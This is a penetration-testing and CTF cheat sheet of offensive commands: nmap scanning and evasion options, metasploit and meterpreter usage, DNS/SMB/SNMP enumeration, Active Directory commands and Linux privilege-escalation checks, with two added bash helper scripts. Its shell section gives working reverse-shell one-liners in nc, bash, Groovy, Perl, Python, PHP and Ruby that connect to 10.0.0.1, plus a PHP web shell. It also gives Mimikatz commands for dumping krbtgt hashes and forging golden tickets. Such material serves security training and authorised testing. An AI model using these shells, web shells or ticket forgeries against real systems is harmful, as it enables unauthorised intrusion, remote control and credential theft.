Sometimes we just forget how to use a tool. Here is a list of useful snippets for penetration testing and CTFs.
- Cryptography
- Forensics
- Web
- Pwn/Reversing
- tmux
- nmap
- metasploit
- scapy
- ARP
  - netdiscover
- DNS
  - whois
  - nslookup
  - host
  - dig
  - fierce
  - DNSenum
  - DNSrecon
  - Sublist3r
- E-mail
  - The Harvester
- http
  - dirb/dirbuster
  - gobuster
  - nikto
  - wpscan
  - sqlmap
- Active Directory
  - Basics
  - Enumeration
  - Lateral Movement
  - Domain Privesc
  - Persistence
  - Trust Privesc
- SNMP
  - onesixtyone
  - SNMPwalk
- SMB
  - rpcclient
  - smbclient
  - smbmap
  - enum4linux
- Windows
  - cmd
  - Powershell
  - WMIC
  - evil-winrm
  - winpeas
  - Empire
- NIX
  - abd
du -hs directory/
cut -b 7- rpcclientusers | cut -d "]" -f 1 #Parse usernames from saved enumdomusers output (lines look like user:[name] rid:[0x1f4])
#Enable mouse (tmux < 2.1; terminal copy-paste no longer works while mouse mode is on)
set-window-option -g mode-mouse on
set -g mouse-select-pane on
#tmux >= 2.1 replaced both options with a single one: set -g mouse on
#Allow root SSH login (Kali linux): edit /etc/ssh/sshd_config, then restart sshd
vim /etc/ssh/sshd_config
PermitRootLogin yes
./forticlientsslvpn_cli --server server:443 --vpnuser aloha < password
#Enable ssh to a VirtualBox guest from a Mac host: check the host-only adapter address on the host,
#then give the guest a static address on the same subnet in /etc/network/interfaces
ifconfig vboxnet0
auto eth1
iface eth1 inet static
address 192.168.56.10
netmask 255.255.255.0
sudo ifup eth1
rlwrap nc -nvvv 127.0.0.1 4444
rlwrap nc -nlvp 4444
Upgrade to Meterpreter shell
#Setup Listener
msfconsole
use exploit/multi/handler
set lhost 10.10.10.10
set lport 4444
set payload linux/x86/shell_reverse_tcp
run
run -j #Run the handler as a background job instead
#Method 1: background the plain shell session and let sessions -u upgrade it
CTRL+Z
sessions -u [session id]
sessions -u 1
sessions
sessions -i [new session id]
#Method 2: run the post module by hand
use post/multi/manage/shell_to_meterpreter
set session 1
run
sessions
sessions -i 2
nmap -sn 10.10.10.0/24 #ping scan
nmap -sT 10.10.10.10 #connect scan
nmap -sS 10.10.10.10 #SYN scan
nmap -sU 10.10.10.10 #UDP scan
nmap -sV 10.10.10.10 #Version fingerprinting
nmap -O 10.10.10.10 #Detect OS
nmap -A 10.10.10.10 #Aggressive (OS detection, version detection, default scripts, traceroute)
nmap -p- 10.10.10.10
nmap -6 [:] #ipv6
#Fast scanning all ports
masscan -p1-65535,U:1-65535 127.0.0.1 --rate=1000 -e tun0
nmap -T5 --open -sS -vvv --min-rate=1000 --max-retries=2 -p- -oA full-ports 10.10.10.x
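The full-port sweep above writes a grepable .gnmap file (via -oA). As an added example that is not part of the original notes, a bash script that pulls the open ports out of that file so the sweep can feed a targeted -sV/-sC scan. The .gnmap content below is constructed in nmap's -oG format, and the hosts and ports in it are made up.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): extract open ports from the
# .gnmap file that `-oA full-ports` writes, so the full-port sweep feeds a
# targeted `-sV -sC` scan. The sample below is constructed in nmap's -oG format.
set -eu

# Constructed grepable output: nmap separates fields with tabs and lists each
# port as port/state/proto/owner/service/rpc/version/.
SAMPLE_GNMAP=$(printf '%b\n' \
  '# Nmap 7.94 scan initiated as: nmap -sS -p- -oA full-ports 10.10.10.0/24' \
  'Host: 10.10.10.5 ()\tStatus: Up' \
  'Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (65532)' \
  'Host: 10.10.10.7 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (65531)' \
  '# Nmap done at ...')

# Print "ip port proto service" for every open port, one per line.
# Filtered/closed entries are dropped so the output is only what is worth probing.
open_ports() {
    awk '/^Host: / && /\tPorts: /{
        ip = $2
        sub(/.*\tPorts: /, "")            # keep only the port list
        sub(/\tIgnored State:.*/, "")      # drop the trailing summary
        n = split($0, entry, /, */)
        for (i = 1; i <= n; i++) {
            split(entry[i], f, "/")        # f[1]=port f[2]=state f[3]=proto f[5]=service
            if (f[2] == "open") print ip, f[1], f[3], f[5]
        }
    }'
}

# Comma-separated open TCP port list for one host, ready for `nmap -p`.
ports_for() {
    open_ports | awk -v h="$1" '$1 == h && $3 == "tcp" { printf "%s%s", sep, $2; sep = "," } END { print "" }'
}

# Usage on a real sweep:
#   open_ports < full-ports.gnmap
#   nmap -sV -sC -p "$(ports_for 10.10.10.5 < full-ports.gnmap)" 10.10.10.5
# Demo against the constructed sample:
printf '%s\n' "$SAMPLE_GNMAP" | open_ports
```

The awk keys on the literal tab before "Ports:" because nmap's grepable format uses tabs between fields and commas only inside the port list, so the parse does not break on service names that contain spaces.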
Advanced
nmap -f 10.10.10.10 #Fragment probes into 8-byte pieces
nmap --mtu 8 10.10.10.10 #Fragment with a custom MTU (must be a multiple of 8)
nmap -D RND:10 10.10.10.10 #10 random decoy addresses
nmap -sI 10.2.2.2 10.10.10.10 #Idle scan using 10.2.2.2 as the zombie
nmap --source-port 54 10.10.10.10 #Force source port 54 (-g 54 is the short form)
nmap --data-length 25 10.10.10.10 #Append 25 random bytes to each probe
nmap 10.10.0.0/11 -sT -sV -Pn -n -vvv --min-rate=5000 --min-hostgroup=256 --min-parallelism=256 #Large range: no ping, no DNS, high parallelism
nmap -Pn -vvv --traceroute --script=firewalk -p1-65535 -D RND:10 10.10.10.10 #Map firewall rules (the firewalk script needs --traceroute)
nmap scripts
ls -l /usr/share/nmap/scripts/http*
nmap --script-help ftp-anon
nmap --script=http-robots.txt 10.10.10.10
tnmap
masscan -p1-65535,U:1-65535 10.10.10.0/24 --rate=1000 -e tun0
search mongo
search cve:2019 type:exploit
search cve:2018 platform:windows
back
exit
info
help show
show payloads
save
show advanced
set DisablePayloadHandler true #Don't start a handler when the exploit runs (use a separate multi/handler)
show encoders
show nops
show evasion
hashdump
sessions -i 7
sysinfo
ps
getpid
hashdump
getprivs
getsystem
migrate 170
kaodic
netdiscover -r 10.10.10.0/24
ettercap -G
dig -t mx umich.com
dig -t any umich.com
dig AXFR yourdomain.com @xfrout1.dynect.net #Zone transfer attempt against a specific nameserver
fierce -dns umich.edu
fierce -dns umich.edu --wordlist /usr/share/wordlist
whois umich.edu
dnsenum umich.edu
dnsrecon -d umich.edu
sublist3r -d google.com
onesixtyone 10.10.10.10 #Community string brute force with the default list
snmpwalk -v 1 -c public 10.10.10.10
snmpwalk -v2c -c public 10.10.10.10 1.3.6.1.2.1.4.34.1.3 #Walk a single subtree (ipAddressIfIndex: configured interface addresses)
enyx 1 public 10.10.10.10 #Enumerate IPv6 addresses over SNMP
rpcclient -U "" -N 127.0.0.1 #Null session
querydominfo
enumdomusers
smbclient -L //127.0.0.1 -N #List shares without a password
mount -t cifs //127.0.0.1/Backups /mnt/smb #Mount share
smbclient //10.10.10.10/share -N #Interactive session, no password
smbmap -H 127.0.0.1
smbmap -u DoesNotExist -H 127.0.0.1 #Guest access check with a non-existent user
enum4linux 127.0.0.1
dirb http://10.10.10.10 /usr/share/dirb/wordlists/common.txt
gobuster dir -u https://127.0.0.1 -w /usr/share/dirb/wordlists/common.txt -x php,html
nikto -h http://10.10.10.10
HTTP header info
curl -i http(s)://10.10.10.10
curl --include http(s)://10.10.10.10 #Long form of -i
Use a specific request method such as POST or PUT
curl -X POST http(s)://10.10.10.10
Follow redirects and show the headers of every hop
curl -i -L 10.11.1.111
Ignore TLS certificate errors on https websites
curl --insecure https://10.10.10.10
Invoke-WebRequest http(s)://10.10.10.10
Invoke-WebRequest -Method 'POST' http(s)://10.10.10.10
PowerView (Get-Net*/Get-Domain* cmdlets) and the ActiveDirectory module (Get-AD* cmdlets) side by side
Get-NetDomain
Get-NetDomain -Domain powershell.local
Get-DomainSID
Get-ADDomain
Get-ADDomain -Identity powershell.local
(Get-ADDomain).DomainSID.Value
Get-NetDomainController
Get-NetDomainController -Domain powershell.local
Get-ADDomainController
Get-ADDomainController -Discover -DomainName powershell.local
Get-NetUser
Get-NetUser -Domain powershell.local
Get-NetUser -UserName labuser
Get-ADUser -Filter * -Properties *
Get-ADUser -Filter * -Server ps-dc.powershell.local
Get-ADUser -Identity labuser
Golden Ticket / Silver Ticket
Trust tickets: forge a golden ticket with the child domain's krbtgt hash and put the forest root's Enterprise Admins SID in /sids (SID history) to escalate from a child domain to the forest root
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' #Dump the krbtgt hash on a child DC
Invoke-Mimikatz -Command '"kerberos::gold /user:Administrator /domain:offensiveps.powershell.local /sid:S-1-5- /krbtgt:a9d1 /sids:s-1-5 /ticket:krb_tkt.kirbi"' #/sid, /krbtgt and /sids are truncated placeholders here
evil-winrm -i 127.0.0.1 -u aloha -p aloha123
Checklist
- Misconfigured services
- Replaceable services
- Configuration files and data containing passwords
- Registry settings
- Information stored in registry
Checklist
- Config files
- SUID binaries
- Scheduled jobs
- Running application/Services
- Distribution
- Kernel version
Config files
ls -ls /etc/ | grep '\.conf'
ls -ls /var/www/html
SUID binaries
find / -user root -perm -4000 -type f 2>/dev/null
Crontab
pspy64 -pf -i 1000 #Print commands and file-system events, scanning procfs every 1000 ms (catches cron jobs without reading crontabs)
nc/ncat
nc -nlvp 4444
nc -nvvv 10.10.10.10 4444 -e /bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
bash
Java (Groovy syntax, e.g. a Jenkins script console)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php system($_GET['aloha']); ?>
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
xterm (attacker runs an X server, the target opens a terminal window on it)
Xnest :1 #Listener on the attacker: nested X server on display :1
xhost +targetip #On the attacker: allow the target to connect to the display
xterm -display 10.0.0.0:1 #On the target: open an xterm on the attacker's display :1
stty (upgrade a dumb reverse shell to a full TTY)
nc -nlvp 4444 #Attacker
python -c 'import pty;pty.spawn("/bin/bash")' #In the shell on the target
Ctrl+Z #Background nc on the attacker
stty raw -echo #In the attacker's own terminal
fg #Bring nc back to the foreground
export SHELL=bash #Back in the target shell
export TERM=xterm-256color
rlwrap
rlwrap nc -nlvp 4444
ipcalc 122.64.0.0 - 122.95.255.255
ipcalc 122.64.0.0/11
find / -name foo.txt -type f -print #print not necessary
find /opt /usr /var -name config -type f
find . -iname config #search case insensitive
grep 'password' /etc/config #search for 'password' in config (quotes not necessary)
grep 'password' * #search all files in current directory
egrep 'password|secret' * #search multiple strings
grep -l config *.php #list the .php files whose contents contain the string 'config'
grep -il config *.php #same but case insensitive
grep -rl 'password' . #same but recursive in current directory
grep -ir 'username' /directory/*
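The SUID find from the NIX checklist and the grep one-liners above are the two searches that most often pay off on a box. As an added example that is not part of the original notes, a bash script that wraps both into functions and runs them against a constructed directory tree (a throwaway mktemp directory with made-up file names and values) instead of a live target, so the output can be checked.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): the SUID and password-grep
# one-liners from the NIX checklist as functions, run against a constructed
# directory tree rather than a live box so the results can be checked.
set -eu

# Build a throwaway tree: one SUID file, one config with a password, one PHP
# file with a secret, one noise file. Every path and value here is made up.
make_fixture() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/var/www/html" "$root/usr/bin"
    printf '#!/bin/sh\necho hi\n' > "$root/usr/bin/backup-helper"
    chmod 4755 "$root/usr/bin/backup-helper"   # set the SUID bit (mode 4xxx)
    printf 'db_host=localhost\ndb_password=Summer2024!\n' > "$root/etc/app.conf"
    printf '<?php $secret = "s3cr3t"; ?>\n' > "$root/var/www/html/config.php"
    printf 'nothing interesting here\n' > "$root/var/www/html/index.html"
    printf '%s\n' "$root"
}

# SUID files under a root, paths printed relative to it. On a real target add
# `-user root`; the fixture files are owned by the current user, so it is left out.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sed "s#^$1/##" | sort
}

# Files whose contents mention password/passwd/secret (case-insensitive):
# the recursive, multi-pattern form of the grep one-liners above.
find_secrets() {
    grep -rilE 'password|passwd|secret' "$1" 2>/dev/null | sed "s#^$1/##" | sort
}

# Usage on a real box: find_suid / ; find_secrets /var/www
# Demo against the constructed tree:
root=$(make_fixture)
echo "SUID:";    find_suid "$root"
echo "Secrets:"; find_secrets "$root"
rm -rf "$root"
```

Both functions send stderr to /dev/null on purpose: on a real host the permission-denied noise from /proc and other users' home directories otherwise drowns the hits.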
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Convert IPv4 to hex (one zero-padded byte per octet)
s = "" #dotted-quad address, e.g. "10.10.10.10"
ip = ""
for i in s.split("."):
    ip += hex(int(i))[2:].rjust(2, '0')
print(ip)
Zlib decompress (carve a zlib-compressed ELF out of a hex string)
import zlib
s = 'aloha' #hex string of the compressed blob (placeholder)
b = bytearray.fromhex(s)
z = zlib.decompress(b)
f = open('elf', 'wb')
f.write(z)
f.close()